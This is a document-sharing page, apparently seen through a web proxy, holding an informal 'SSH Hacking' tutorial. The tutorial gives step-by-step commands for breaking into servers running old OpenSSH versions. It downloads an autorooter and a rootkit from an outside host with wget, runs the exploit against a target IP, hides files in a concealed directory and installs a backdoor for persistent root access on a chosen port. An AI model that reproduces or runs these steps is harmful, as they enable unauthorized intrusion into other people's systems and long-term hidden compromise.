0% found this document useful (0 votes)
122 views2 pages

SSH Hacking

This document provides instructions for hacking SSH servers using known exploits. It describes downloading tools like an SSH client and rootkit from external sites. The process involves finding vulnerable servers, using an autorooter tool to exploit known vulnerabilities in older SSH versions like SSH-1.99 to gain remote shell access. Once access is obtained, it describes hiding the activity by creating hidden directories and installing the rootkit to maintain persistent unauthorized access with a password of the attacker's choosing on a custom port.
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
122 views2 pages

SSH Hacking

This document provides instructions for hacking SSH servers using known exploits. It describes downloading tools like an SSH client and rootkit from external sites. The process involves finding vulnerable servers, using an autorooter tool to exploit known vulnerabilities in older SSH versions like SSH-1.99 to gain remote shell access. Once access is obtained, it describes hiding the activity by creating hidden directories and installing the rootkit to maintain persistent unauthorized access with a password of the attacker's choosing on a custom port.
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 2

SSH Hacking

a little tut i came across :-)


SSH is like a Telnet client, but more secure.. Most older
but used versions are hackable and its very easy..
..if you know how..
First.. DONT Give away this tutorial.. I DOnt want any
shit with other n00bs who read this mmkay ?? I TRUST YOU
GUYS !!
First, we need some tools
secureCRT (h**ps://secure.vandyke.com/vandyke-...ODUCT=SecureCRT)
A SSH Client to connect to an SSH box.. With this
version u can SSH with a proxy
LNX r00tkit (h**p://gaajus.gearhost.net/lnx.gz)
a rootkit, best there is i think.. Very easy to use..
Only needed in last step
X6 (h**p://gaajus.gearhost.net/x6.tgz)
The Autorooter..
First, you gotta have a scan with vulernable ips (or just
one )
WATcH OUT FOR SSH-1.99 OPENSSH 2.1.1 !! VERY VULERNABLE
Almost always works for exploiting..
Lets say we got an IP, 0.0.0.0, and a shell..
Connect to your shell and type :
wget h**p://gaajus.gearhost.net/x6.tgz
it downloads the autorooter to the shell..
When its done, Type : tar xzvf x6.tgz
Then type cd x6
When in the dir, type : ./x6 -t#
it shows u all the Exploitable SSH Versions.. Lets say we got an
exploitable SSH-1.99-OpenSSH-2.1.1 (target 123 on the list)
The Ip = 0.0.0.0
you type :
./x6 -t123 0.0.0.0
Now it says something like : ATTACH NOW..
Wait 6 Seconds then push Enter.. Normally it starts
exploiting, it says like
1. 0x0000000 . . [SEGV]
2. 0x00000c4 . . [SURVIVED]
Something like that..
Just let it go and it will exploit your box..
If it doesnt go to 1. ..., and it says FATAL: no
its not vulernable
Then, when it exploited the box, u get some thing like :
no crash been found
Rem from Remote : CHRIS CHRIS
*** YOU ARE IN ***
Boxname
Boxhost blahblah
then type the following
cd /usr/man/man3/
and then :
mkdir ...
and then :
cd ...
This is an hidden dir so the Sysop wont notice
Now we r going to download the Rootkit
type :
wget h**p://gaajus.gearhost.net/lnx.gz
It will start downloading..
When done, type : tar xzvf lnx.gz
and then:
cd lnx
Then, we r going to start it..
Lets say u want password "poop" on port 25374
then u type :
./own poop 25374
It Installs the Rootkit, and Done !! Connect to the ip
with port 25374 (or the one u took)
Username = root
and u gave the password urself..

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy